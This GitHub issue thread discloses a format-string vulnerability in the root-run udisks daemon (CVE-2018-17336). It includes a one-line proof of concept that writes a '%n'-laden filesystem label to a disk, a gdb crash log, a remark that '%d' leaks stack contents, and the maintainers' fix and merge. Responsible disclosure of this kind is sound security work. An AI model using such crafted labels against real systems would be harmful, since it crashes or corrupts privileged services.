Malformed filesystem labels allows for a string format vulnerability #578

oxagast · 2018-09-16T04:52:50Z

A malformed file system label can trigger a string format vulnerability in udisks.
For example:

umount /dev/sdb1; mkfs.vfat -n "AAAAAAAAAAA" /dev/sdb1; dd if=/dev/sdb1 bs=1M count=200 | sed 's|AAAAAAAAAAA|%n%n%n%n%n0|g' | sudo dd of=/dev/sdb1 bs=1M

Crashes udisks2, and since the %n modifier allows for arbitrary memory manipulation this could pose a security risk, as udisksd runs root.

Reading symbols from /usr/lib/udisks2/udisksd...(no debugging symbols found)...done.
(gdb) r
Starting program: /usr/lib/udisks2/udisksd
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
udisks-Message: 00:02:18.468: udisks daemon version 2.7.6 starting
[New Thread 0x7ffff3618700 (LWP 3731)]
[New Thread 0x7ffff2e17700 (LWP 3732)]
[New Thread 0x7ffff2616700 (LWP 3733)]

** (udisksd:3727): WARNING **: 00:02:18.558: failed to load module mdraid: libbd_mdraid.so.2: cannot open shared object file: No such file or directory

(udisksd:3727): udisks-WARNING **: 00:02:18.567: Failed to load the 'mdraid' libblockdev plugin
[New Thread 0x7fffe26db700 (LWP 3734)]
[New Thread 0x7fffe1eda700 (LWP 3741)]
udisks-Message: 00:02:18.631: Acquired the name org.freedesktop.UDisks2 on the system message bus
[Thread 0x7ffff2e17700 (LWP 3732) exited]
[New Thread 0x7ffff2e17700 (LWP 3899)]
udisks-Message: 00:02:37.388: Mounted /dev/sdb1 at /media/marshall/9D41-5816 on behalf of uid 1000
[Thread 0x7ffff2e17700 (LWP 3899) exited]
udisks-Message: 00:04:04.881: Cleaning up mount point /media/marshall/9D41-5816 (device 8:17 is not mounted)
[New Thread 0x7ffff2e17700 (LWP 5338)]
[Thread 0x7ffff2e17700 (LWP 5338) exited]
[New Thread 0x7ffff2e17700 (LWP 5967)]
[Thread 0x7ffff2e17700 (LWP 5967) exited]
[New Thread 0x7ffff2e17700 (LWP 6790)]
[Thread 0x7ffff2e17700 (LWP 6790) exited]
[New Thread 0x7ffff2e17700 (LWP 9510)]
[Thread 0x7ffff2e17700 (LWP 9510) exited]
[New Thread 0x7ffff2e17700 (LWP 10277)]
udisks-Message: 00:24:22.569: Mounted /dev/sdb1 at /media/marshall/AAAAAAAAAAA on behalf of uid 1000
[Thread 0x7ffff2e17700 (LWP 10277) exited]
udisks-Message: 00:29:20.632: Cleaning up mount point /media/marshall/AAAAAAAAAAA (device 8:17 no longer exists)
[New Thread 0x7ffff2e17700 (LWP 11320)]
udisks-Message: 00:29:25.451: Mounted /dev/sdb1 at /media/marshall/AAAAAAAAAAA on behalf of uid 1000
[Thread 0x7ffff2e17700 (LWP 11320) exited]
udisks-Message: 00:31:31.470: Cleaning up mount point /media/marshall/AAAAAAAAAAA (device 8:17 no longer exists)
[New Thread 0x7ffff2e17700 (LWP 11913)]
udisks-Message: 00:31:37.852: Mounted /dev/sdb1 at /media/marshall/AAAAAAAAAAA on behalf of uid 1000
[Thread 0x7ffff2e17700 (LWP 11913) exited]
[New Thread 0x7ffff2e17700 (LWP 12057)]
[Thread 0x7ffff2e17700 (LWP 12057) exited]
udisks-Message: 00:33:08.861: Cleaning up mount point /media/marshall/AAAAAAAAAAA (device 8:17 no longer exists)
[New Thread 0x7ffff2e17700 (LWP 12281)]
*** %n in writable segment detected ***

Thread 16 "pool" received signal SIGABRT, Aborted.
[Switching to Thread 0x7ffff2e17700 (LWP 12281)]
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
51      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb)

The text was updated successfully, but these errors were encountered:

pothos · 2018-09-18T10:44:48Z

With %d you don't abort UDisks but can leak stack values. This makes it easier to test because I actually couldn't restart the system UDisks even after removing the device in question.

If the message in g_log_structured itself contained format sequences like %d or %n they were applied again, leading to leaked stack contents and possibly memory corruption. It can be triggered e.g. by a volume label containing format sequences. Print the message argument itself into a "%s" string to avoid intepreting format sequences. storaged-project#578

oxagast · 2018-09-18T21:22:10Z

To get UDisks to run correctly again after injecting a %n or something else that causes it to abort you'll have to remove the appropriate entry from /var/lib/udisks2/mounted-fs.

oxagast · 2018-09-22T15:42:23Z

Merge looks good, thanks for the quick fix.

vpodzime · 2018-09-22T16:12:59Z

Merge looks good, thanks for the quick fix.

Thanks for reporting this!

abergmann · 2018-09-24T06:10:25Z

CVE-2018-17336 was assigned to this issue.

vpodzime · 2018-09-24T10:52:29Z

CVE-2018-17336 was assigned to this issue.

Wooohooo, my first CVE! 🎆

If the message in g_log_structured itself contained format sequences like %d or %n they were applied again, leading to leaked stack contents and possibly memory corruption. It can be triggered e.g. by a volume label containing format sequences. Print the message argument itself into a "%s" string to avoid intepreting format sequences. #578

pothos mentioned this issue Sep 18, 2018

Fix string format vulnerability #579

Merged

oxagast closed this as completed Sep 22, 2018

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Malformed filesystem labels allows for a string format vulnerability #578

Malformed filesystem labels allows for a string format vulnerability #578

oxagast commented Sep 16, 2018

pothos commented Sep 18, 2018

oxagast commented Sep 18, 2018

oxagast commented Sep 22, 2018

vpodzime commented Sep 22, 2018

abergmann commented Sep 24, 2018

vpodzime commented Sep 24, 2018

Malformed filesystem labels allows for a string format vulnerability #578

Malformed filesystem labels allows for a string format vulnerability #578

Comments

oxagast commented Sep 16, 2018

pothos commented Sep 18, 2018

oxagast commented Sep 18, 2018

oxagast commented Sep 22, 2018

vpodzime commented Sep 22, 2018

abergmann commented Sep 24, 2018

vpodzime commented Sep 24, 2018